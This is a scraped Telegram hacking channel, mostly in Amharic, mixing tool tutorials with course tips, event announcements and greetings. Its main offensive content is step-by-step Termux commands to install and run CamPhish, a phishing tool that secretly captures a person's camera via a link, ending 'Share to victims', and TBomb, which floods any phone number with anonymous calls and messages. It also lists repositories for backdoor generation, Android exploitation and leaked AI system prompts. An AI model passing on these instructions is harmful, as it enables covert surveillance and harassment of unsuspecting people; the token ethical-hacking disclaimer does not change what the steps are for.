ᶜⁱᵖʰᵉr ALL In One
76 subscribers
26 photos
3 videos
3 files
39 links
Download Telegram
እስኪ በደንብ ወደስራ እንድንገባ በተቻላችሁ አቅም add members ለማድረግ ሞክሩ በ hacking ዙሪያ እውቀት ላለው ሰው share አድርጉ ምክንያቱም እሱም መቶ እኛ የማናውቀውን ብዙ ነገር ያስተምረናል


Share አድርጉ

ከላይ add members የሚለውን በ መንካትም add አድርጉ

ነገ በ አዲስ ነገር እንመለሳለን


𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
1
በብዛት termux root ባያስፈልገውም ነገር ግን አንዳንድ ትልልቅ እና የተወሳሰቡ ስራወችን ለመስራት root access ያስፈልጋል ለዚህም ይሄን መጠቀም ትችላላችሁ

ይሄ tool ጥቅሙ ስልካችሁ rooted የሆነ እንዲመስለው ማድረግ ነው ይሄን አብርታችሁ ስትጠቀሙ ብቻ ነው ስትወጡ አብሮ ይጠፋል
apt-get install git -y
git clone https://github.com/adarshaddee/root.git
cd root
chmod +x main
./main

ሁሌ እንደምላችሁ share አድርጉ ቀጣይ የማሳያችሁ እንዴት የሰውን camera በ አንድ link ብቻ 😳 ለዛውም በስልክ 📱 እንደምታነሱ ነው 📸ይሄ ሁሉ ሲሆን የላካቺሁለት ሰው ምንም አያውቅም🤫

ነገር ግን ቢያንስ ቢያንስ 500 መግባት ይኖርብናል ቢቻል ከዛም ይለፈልን
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
500 members ባንገባም ሁሉም ሰው የሚፈልገው camphish ይሄው 👇👇
apt update && apt upgrade -y 
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
chmod +x camphish.sh
./camphish.sh

`Usage`
1
1
Enter your festivals name
Open new seasson
And back to main directory
cd ~

And start ngrok server with 3333 port
./ngrok http 3333

Now back to seasson 1 and start camphish and
copy direct link

Share to victims


Disclaimer=>This information is solely for the purpose of learning Ethical Hacking and security testing. Always obtain explicit permission from the system owner before conducting any tests. Actions taken without proper authorization can lead to severe legal consequences.


𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>https://t.me/cipher_attacks
TBomb
TBomb Is A Tool That Can Be Used To Send A Lot Of Anonymous Messages And Calls To Any Person.
pkg update
pkg upgrade -y
pkg install git -y
pkg install python -y
git clone https://github.com/TheSpeedX/TBomb.git
cd TBomb
bash TBomb.sh

```Single Line Command Installation:
pkg update && pkg upgrade -y && pkg install git -y && pkg install python -y && git clone https://github.com/TheSpeedX/TBomb.git && cd TBomb && bash TBomb.sh`
Usage:
•Type Country Code
•Type Phone Number
•No Of Attempts
•Time Delay
Click On The Link For The Detailed Installation:
https://geek-times.com/how-to-install-call-bomber-in-termux/
Benefits of Penetration testing
(Password Cracking Methods)
የይለፍ ቃል ለመስበር የተለያዩ አውቶማቲክ መሳሪያዎችን (tools) እና ስልቶችን እንጠቀማለን።

መሰረታዊ cracking tools

1.Brute-Force Attack==>
•ይህ ዘዴ ሁሉንም ሊሆኑ የሚችሉ የይለፍ ቃል ጥምረቶችን (combinations) አንድ በአንድ የመሞከር ሂደት ነው። ለምሳሌ፣ "aa", "ab", "ac" እያለ በፊደል፣ በቁጥር እና በልዩ ምልክቶች የሚገኘውን እያንዳንዱን ጥምረት ይሞክራል።
•እንዴት ይሰራል? ጠላፊው ልዩ ሶፍትዌር ተጠቅሞ በቢሊዮኖች የሚቆጠሩ የይለፍ ቃል ጥምረቶችን በሰከንዶች ውስጥ ይሞክራል።
•መከላከል: የይለፍ ቃላችሁ ረጅም እና ውስብስብ ከሆነ፣ ብሩት ፎርስ ጥቃት ለመስበር እጅግ በጣም ብዙ ጊዜ ይወስዳል። ለምሳሌ፣ 8 character ያለው የይለፍ ቃል ለመስበር ሰዓታት ወይም ቀናት ሊወስድ ይችላል፣ 12 character ያለው ግን ለዓመታት ወይም ከዚያ በላይ ሊወስድ ይችላል።

2.Dictionary Attack
ይህ ዘዴ ከብሩት ፎርስ ይለያል። Hackers የተለመዱ ቃላትን፣ ስሞችን፣ የ ትውልድ ቀናትን እና ሌሎች በተደጋጋሚ ጥቅም ላይ የሚውሉ የይለፍ ቃላትን የያዘ መዝገበ ቃላት(dictionary) ይጠቀማል።
•አሰራር? ሶፍትዌሩ በመዝገበ ቃላቱ ውስጥ ያሉትን ቃላት በሙሉ እንደ የይለፍ ቃል ይሞክራል። ብዙ ሰዎች እንደ "password"፣ "123456"፣ "qwerty"፣ "iloveyou" ወይም የልጆቻቸውን ስም ስለሚጠቀሙ ይህ ዘዴ በጣም ውጤታማ እንዲሆን ያደርገዋል።
•መከላከል: በመዝገበ ቃላት ውስጥ የሚገኙ ቃላትን ወይም ቀላል የቁጥር ቅደም ተከተሎችን እንደ የይለፍ ቃል ከመጠቀም መቆጠብ ብቸኛው መፍትሄ ነው ።
Check my password ያሉ website በ መግባት ማረጋገጥ ትችላላችሁ

ማሳሰቢያ=>>ይለፍ ካላችሁን check በ ምታደርጉ ሰዓት አንዳንድ ፊደላትን ለመቀየር ሞክሩ ይሄ ለደህንነታችሁ በጣም ወሳኝ ነው


𝗦𝗵𝗮𝗿𝗲=>>https://t.me/cipher_attacks
𝗝𝗼𝗶𝗻=>>https://t.me/cipher_communitys
ይወዳደሩ ... ያሸንፉ... ይሸለሙ
ልዩ የሃካቶን ውድድር ጥሪ

ጷጉሜን 5/2017 ዓ.ም በሀገር አቀፍ ደረጃ የሚከበረውን “የነገ ቀን” ምክንያት በማድረግ ኢትዮጵያውያን ታዳጊ ወጣቶች፣ የሶፍትዌር አልሚዎች፣ ኮደሮች፣ የኮምፒዩተር ፕሮግራመሮች እና ፍላጎት ያላቸው ዓካላት በሙሉ በ"የነገዋ ኢትዮጵያ ሃካቶን ውድድር" ላይ እንዲሳተፉ ግብዣ ቀርቧል።
የነገዋ ኢትዮጵያ ሃካቶን ውድድር ለ48 ሰዓት በኢትዮጵያ ኢንፎርሜሽን ቴክኖሎጂ ፓርክ (IT Park) በሚገኘው Innobiz-K Ethiopia ኢንኩቤሽን ማዕከል የሚከናወን ሲሆን፤ የመዝጊያ እና የሽልማት መርሃ-ግብሩ ቋጉሜ 5 ቀን 2017 ዓ.ም በሳይንስ ሙዚዬም ይካሄዳል።
ይህ ልዩ የአዲስ ዓመት ፕሮግራም፤ ግብርናን፣ ኢንዱስትሪን እና የመንግስት አገልግሎት አሰጣጥን ዲጂታል ለማድረግ ያለመ ነው።
የመመዝገቢያው ቀን እስከ ነሐሴ 28 ቀን 2017 ዓ.ም ሲሆን፤ ለመመዝገብ QR ኮዱን ስካን በማድረግ ወይም ከዚህ በታች ባለው ማስፈንጠሪያ መመዝገብ ይችላሉ፡፡

https://docs.google.com/.../1FAIpQLSdKLtrK8XQLfx.../viewform

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
python course የምትወስዱባቸው እና certificate ለማግኘት የሚጠቅሟቹ ቦታዎች
coursia
Python for Everybody Specialization by University of Michigan. በ Dr. charles rasel and Dr. Chuck የሚሰጥ ኮርስ ነው for beginners በጣም አሪፍ ቦታ ነው. ነገር ግን certificate የምትፈልጉ ከሆነ ክፍያ ያስፈልገዋል ኮርሱን ብቻ ከሆነ ግን የምትፈልጉት ነጻ ነው::ደግሞ ከዜሮ ተነስቶ እስከ database ድረስ ያስተምራል
freeCodeCamp
ይሄም በተመሳሳይ ሙሉ በሙሉ free ነው.
አሪፍ አሪፍ python course በ video እና በ ፅሁፍ ያቀርባል።
እና ደግሞ youtube ላይ እራሱ learn python-full course for beginners የሚል በጣም ታዋቂ video አላቸው።
udemy
እዚህ ላይ ብዙ ኮርሶች ማግኘት ይቻላል።ለምሳሌ
==>100 days of code - the complate python pro bootcamp for 2024
==>complate python developer in 2024 / zero to master
የሚሉ ታዋቂ course አላቸው ። እነዚህ ቅናሽ አላቸው::
=>Codecademy
ይሄን ለየት የሚያደርገው (interactive)የሆነ መማሪያ መንገድ አለው።እዛው ላይ ውጤቱን በማየት መማር ትችላላችሁ. free አማራጭም አሉት::
#ይቀጥላል

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
ሌሎች ደግሞ
°HackerRank / leetCode
challenge የምትዎዱ የተለያዩ challenge በመፍታት ችሎታ ለማዳበር አሪፍ ነው።
Exercism
እዚህ ላይ code ከፃፋቹ በሁአላ በተለያዩ ልምድ ባላቸው programer ሮች ማስፈተሽ ትችላላችሁ
Replit
online IDE ሲሆን python code ለመፃፍ ፕሮጀክት ለመስራት አሪፍ ነው
==>book
•Automate the Boring Stuff with Python
•Python Crash Course
==>በ video መልክ ከሆነ የሚመቻችሁ
http://freeCodeCamp.org ከላይ ያለው ነው
•Corey Schafer
•Mosh Hamedani
ይሄ ለጀማሪ recommended አደርጋለሁ እኔ እየተማርኩ ያለሁት በዚህ ነው 6 ሰዓት video youtube ላይ አለው እና ለጀማሪ በደንብ ትምህርት የሚያስጨብጥ ሰውዬ ነው
==>ሌሎች
•reddit
r/learnpython, r/python
•github
የሌላ ሰው ፕሮግራም ለማጥናት

==>ባጠቃላይ ጀማሪ ከሆናችሁ recommed የተደረጉት
coursea or free code camp ናቸው
እኔ በግሌ ግን የ mosh ን video በደንብ እዩት.


ስትማሩ more practical ለመሆን ምክሩ
ከላይ ያሉት ለ python ጀማሪዎች አሪፍ ናቸው ለጀማሪ ብቻ ሳይሆን ለሚያቁትም አሪፍ ናቸው
የኖረ ሕልማዊ እንቆቅልሽ ተፈታ፤ የዛሬ የመቻል እውነታችን ተገለጠ፤ የነገ ትውልድ ተስፋ በአብርኾት ፈነጠቀ!
data:
- name: "The Book of Secret Knowledge"
url: "https://github.com/trimstray/the-book-of-secret-knowledge"
description: "A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more."
stars: 185432
topics: ["awesome-list", "hacking", "security"]
- name: "funNLP"
url: "https://github.com/fighting41love/funNLP"
description: "NLP, text mining, and data processing resources."
stars: 75916
topics: ["nlp", "text-mining", "hacking"]
- name: "Hacking Tool"
url: "https://github.com/Z4nzu/hackingtool"
description: "ALL IN ONE Hacking Tool For Hackers."
stars: 53515
topics: ["allinonehackingtool", "hacking", "linux"]
- name: "Tools of The Trade"
url: "https://github.com/cjbarber/ToolsOfTheTrade"
description: "Tools of The Trade, from Hacker News."
stars: 16828
topics: ["tools", "hacking"]
- name: "Awesome Hacking"
url: "https://github.com/carpedm20/awesome-hacking"
description: "A curated list of awesome Hacking tutorials, tools and resources."
stars: 14709
topics: ["awesome", "hacking", "pentesting"]
- name: "Hacker Roadmap"
url: "https://github.com/sundowndev/hacker-roadmap"
description: "A collection of hacking tools, resources and references to practice ethical hacking."
stars: 14534
topics: ["hacking", "pentesting", "security"]
- name: "Subfinder"
url: "https://github.com/projectdiscovery/subfinder"
description: "Fast passive subdomain enumeration tool."
stars: 12251
topics: ["osint", "hacking", "subdomains"]
- name: "fsociety"
url: "https://github.com/Manisso/fsociety"
description: "FSOCiety Hacking Tools Pack – A Penetration Testing Framework."
stars: 11477
topics: ["hacking", "pentest", "tools"]
- name: "Osintgram"
url: "https://github.com/Datalux/Osintgram"
description: "OSINT tool for Instagram account analysis."
stars: 11321
topics: ["osint", "hacking", "instagram"]
- name: "TheFatRat"
url: "https://github.com/screetsec/TheFatRat"
description: "Tool to generate backdoor and post exploitation attack."
stars: 10540
topics: ["hacking", "backdoor", "tool"]
- name: "CL4R1T4S"
url: "https://github.com/elder-plinius/CL4R1T4S"
description: "LEAKED SYSTEM PROMPTS FOR VARIOUS AI SYSTEMS."
stars: 9889
topics: ["hacking", "red-team", "transparency"]
- name: "Red-Teaming-Toolkit"
url: "https://github.com/infosecn1nja/Red-Teaming-Toolkit"
description: "Cutting-edge open-source security tools for red teamers."
stars: 9783
topics: ["hacking", "red-team", "security"]
- name: "trape"
url: "https://github.com/jofpin/trape"
description: "People tracker on the Internet: OSINT analysis and research tool."
stars: 8455
topics: ["osint", "hacking", "tracking"]
- name: "RedTeam-Tools"
url: "https://github.com/A-poc/RedTeam-Tools"
description: "Tools and Techniques for Red Team / Penetration Testing."
stars: 7263
topics: ["red-team", "pentesting", "security-tools"]
- name: "Osint Stuff Tool Collection"
url: "https://github.com/cipher387/osint_stuff_tool_collection"
description: "A collection of several hundred online tools for OSINT."
stars: 6909
topics: ["osint", "hacking", "tools"]
- name: "reconFTW"
url: "https://github.com/six2dez/reconftw"
description: "Automated recon tool for identifying vulnerabilities."
stars: 6726
topics: ["recon", "hacking", "bug-bounty"]
- name: "HackTools"
url: "https://github.com/LasCC/HackTools"
description: "All-in-One browser extension for offensive security professionals."
stars: 6249
topics: ["hacking", "tools", "payloads"]
- name: "K8tools"
url: "https://github.com/k8gege/K8tools"
description: "Comprehensive hacking tools for various purposes."
stars: 6049
topics: ["hacking", "exploit", "pentest"]
- name: "mosint"
url: "https://github.com/alpkeskin/mosint"
description: "Automated e-mail OSINT tool."
stars: 5493
topics: ["osint", "email", "hacking"]
- name: "GhostTrack"
url: "https://github.com/HunxByts/GhostTrack"
description: "Tool to track location or mobile number."
stars: 5484
topics: ["osint", "hacking", "termux"]
- name: "PhoneSploit-Pro"
url: "https://github.com/AzeemIdrisi/PhoneSploit-Pro"
description: "Remotely exploit Android devices using ADB and Metasploit."
stars: 5335
topics: ["android", "hacking", "metasploit"]
- name: "game-hacking"
url: "https://github.com/dsasmblr/game-hacking"
description: "Tutorials, tools, and more related to reverse engineering video games."
stars: 5232
topics: ["game-hacking", "reverse-engineering", "cheat-engine"]
- name: "Ladon"
url: "https://github.com/k8gege/Ladon"
description: "Large-scale internal penetration scanner with various tools."
stars: 5167
topics: ["hacking", "scanner", "getshell"]
- name: "NetExec"
url: "https://github.com/Pennyw0rth/NetExec"
description: "The Network Execution Tool for red team operations."
stars: 4661
topics: ["hacking", "pentest", "networks"]
- name: "h8mail"
url: "https://github.com/khast3x/h8mail"
description: "Email OSINT & Password breach hunting tool."
stars: 4647
topics: ["osint", "hacking", "password"]
ውድ የቻናላችን ተከታታዮች እና ተከታዮች 👋

እንኳን ለብርሃናማው እና ተስፋ ለሞላበት ለ2018 ዓ.ም አዲስ ዓመት በሰላም አደረሳችሁ/አደረሰን! 🌼

ያለፈውን ዓመት በብዙ ትዝታዎች ተሞክሮዎች ፈተናዎች እና ድሎች 💪 አልፈን እነሆ አዲሱን ዓመት በታላቅ ተስፋ እና ፍቅር ለመቀበል በቅተናል። ፈጣሪ አምላክ ይህን አዲስ ዓመት የሰላም 🕊️፣ የፍቅር ፣ የጤና ፣ የደስታ 😊ና የስኬት ምዕራፍ ያድርግልን።

የተጣሉ የሚታረቁበት የታመሙ የሚፈወሱበት የተራቡ የሚጠግቡበት የተጨነቁ የሚጽናኑበት ሁላችንም በአንድነት እና በፍቅር የምንኖርበት ዓመት እንዲሆን ከልብ እንመኛለን።

በዚህ አዲስ ዓመት ህልሞቻችሁ እውን የሚሆኑበት የምትፈልጉት ሁሉ የሚሳካበት እና መልካም ነገሮች የሚበዙበት ጊዜ እንዲሆንላችሁ ከወዲሁ ምኞታችንን እንገልጻለን። እኛም እንደ ቻናላችሁ ሁሌም አዳዲስ እና ጠቃሚ መረጃዎችን በማቅረብ ከጎናችሁ እንደምንሆን ቃል እንገባለን።

መልካም አዲስ ዓመት ለሁላችንም.🌼 ፍቅርና ሰላም ከሁላችንም ጋር ይሁን!

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
2
Forwarded from Yotor security channel
Get ready for Ethiopia CyberShield Showdown Week, featuring bootcamps, red-team exploits, incident response simulations, and a high-stakes Capture the Flag (CTF). Join us to learn, compete, and connect with a chance to win prizes, merch, and recognition.

📅 Event Details

🔹 Online Bootcamp: Sept 17 to 18 | 8:00 PM to 10:00 PM
🔹 In-Person CTF: Sept 19 to 21 | 9:00 AM to 5:00 PM
📍 Capstone, ALX Tech Lideta Hub, Lideta

🔗 Register now: https://luma.com/jyu7twze

#ALXEthiopia #CyberShieldShowdown #CTF2025 #Cybersecurity #ALXAfrica #dohardthings #lifeatalx
⭐️የ12ኛ ክፍል ብሔራዊ ፈተና ውጤት  ነገ ይለቀቃል

❤️ከታች ባለው ቻናል ኮዳችሁን እየላካችሁ ማየት ትችላላችሁ

👇👇
https://t.me/addlist/ELi_A1FDWABhOWVk
https://t.me/addlist/ELi_A1FDWABhOWVk
Please open Telegram to view this post
VIEW IN TELEGRAM
በመጨረሻም ውጤት ተለቋል።

ውጤታችሁን ለማየት
1. result.eaes.et
2. result.neaea.gov.et
3. SMS 6284 ተጠቀሙ

ትምህርት ሚኒስቴር

ተጨማሪ ትምህርታዊ መረጃ ለማግኘት ቻናላችን ይቀላቀሉ

🔻https://t.me/Tmhrt_Ministers
🔻https://t.me/Tmhrt_Ministers
Please open Telegram to view this post
VIEW IN TELEGRAM
ቤተሰብ channel ላይ warnning ላይ ሆኜ ነበር እና ዛሬ ተለቆልኛል:: እና በኔ በኩል አዳዲስ ነገር ሲኖር የማጋራችሁ ይሆናል

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks